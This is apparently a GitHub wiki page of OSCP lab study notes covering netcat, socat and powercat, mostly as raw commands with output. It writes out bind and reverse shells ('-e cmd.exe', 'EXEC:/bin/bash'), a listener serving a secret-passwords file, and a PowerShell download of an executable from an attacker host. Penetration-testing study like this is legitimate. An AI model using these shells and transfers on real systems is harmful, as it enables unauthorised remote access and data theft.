-
Notifications
You must be signed in to change notification settings - Fork 0
Home
Welcome to the oscp wiki!
4.1.1 TCP/UDP Port
- TCP 110 (POP3 mail service) connect
nc -nv 10.11.0.22 110
(UNKNOWN) [10.11.0.22] 110 (pop3) open
+OK POP3 server lab ready <00003.1277944@lab>
- Interact with server
nc -nv 10.11.0.22 110
(UNKNOWN) [10.11.0.22] 110 (pop3)
4.1.2 Listening on a TCP/UDP Port
- Setup listener 4444 TCP
- Windows machine
- IP address 10.11.0.22
nc -nlvp 4444
listening on [any] 4444 ...
- Connect from Linux attacker machine
nc -nv 10.11.0.22 4444
(UNKNOWN) [10.11.0.22] 4444 (?) open
- Chat displayed on NETCAT terminal
nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.11.0.22] from <UNKNOWN) [10.11.0.4] 43447
4.1.3 Transferring Files with Netcat
- Set up a Netcat listener on port 4444
- Redirect any output into a file
- wget.exe file serve
nc -nlvp 4444 > incoming.exe
listening on [any] 4444 ...
locate wget.exe
/usr/share/windows-resources/binaries/wget.exe
nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe
(UNKNOWN) [10.11.0.22] 4444 (?) open
- Receive NETCAT connect
nc -nlvp 4444 > incoming.exe
listening on [any] 4444 ...
connect to [10.11.0.22] from <UNKNOWN) [10.11.0.4] 43459
^C
C:\Users\offsec
4.1.4 Remote Administration with Netcat
- Execute commands via "-e"
- Windows and Linux listener
nc -nlvp 4444 -e cmd.exe
listening on [any] 4444 ...
nc -nlvp 4444 -e /bin/bash
listening on [any] 4444 ...
4.2.2 Socat File Transfers
- Child process created
- Connection made to listener
- Filename to transfer
sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt
4.2.3 Socat Reverse Shells
- Listener 443 TCP
socat -d -d TCP4-LISTEN:443 STDOUT
...
socat[4388] N listening on AF=2 0.0.0.0:443
- Connect listener
socat TCP4:10.11.0.22:443 EXEC:/bin/bash
4.2.4 Socat Encrypted Bind Shells
-
Create OPENSSL certificate
-
Combine .key and .crt files
-
Output is .pem file
openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt
sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
- verify=0 to disable SSL certificate verification
socat - OPENSSL:10.11.0.4:443,verify=0
4.3.1 PowerShell File Transfers
- Windows 2016
- Powershell Set-ExecutionPolicy Unrestricted
- Policy Get-ExecutionPolicy
powershell -c "(new-object System.Net.WebClient).DownloadFile('http:/ /10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
wget.exe -V
GNU Wget 1.9.1
4.3.5 Powercat File Transfers
- Netcat listener
sudo nc -lnvp 443 > receiving_powercat.ps1
powercat -c 10.11.0.4 -p 443 -i C:\Users\Offsec\powercat.ps1
4.3.6 Powercat Reverse Shells
- Send a reverse shell
sudo nc -lvp 443
listening on [any] 443 ...
powercat -c 10.11.0.4 -p 443 -e cmd.exe
connect to [10.11.0.4] from (UNKNOWN) [10.11.0.22] 63699 Microsoft Windows [Version 10.0.17134.590]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\offsec>
4.3.7 Powercat Bind Shells
- A powercat bind shell
powercat -l -p 443 -e cmd.exe
nc 10.11.0.22 443
Microsoft Windows [Version 10.0.17134.590] (c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\offsec>
4.5.2 Filtering Traffic
- Read from our packet capture file
sudo tcpdump -n -r password_cracking_filtered.pcap | awk -F" " '{print }' | sort | uniq -c | head
sudo tcpdump -n src host 172.16.40.10 -r password_cracking_filtered.pcap
sudo tcpdump -n dst host 172.16.40.10 -r password_cracking_filtered.pcap
sudo tcpdump -n port 81 -r password_cracking_filtered.pcap
sudo tcpdump -nX -r password_cracking_filtered.pcap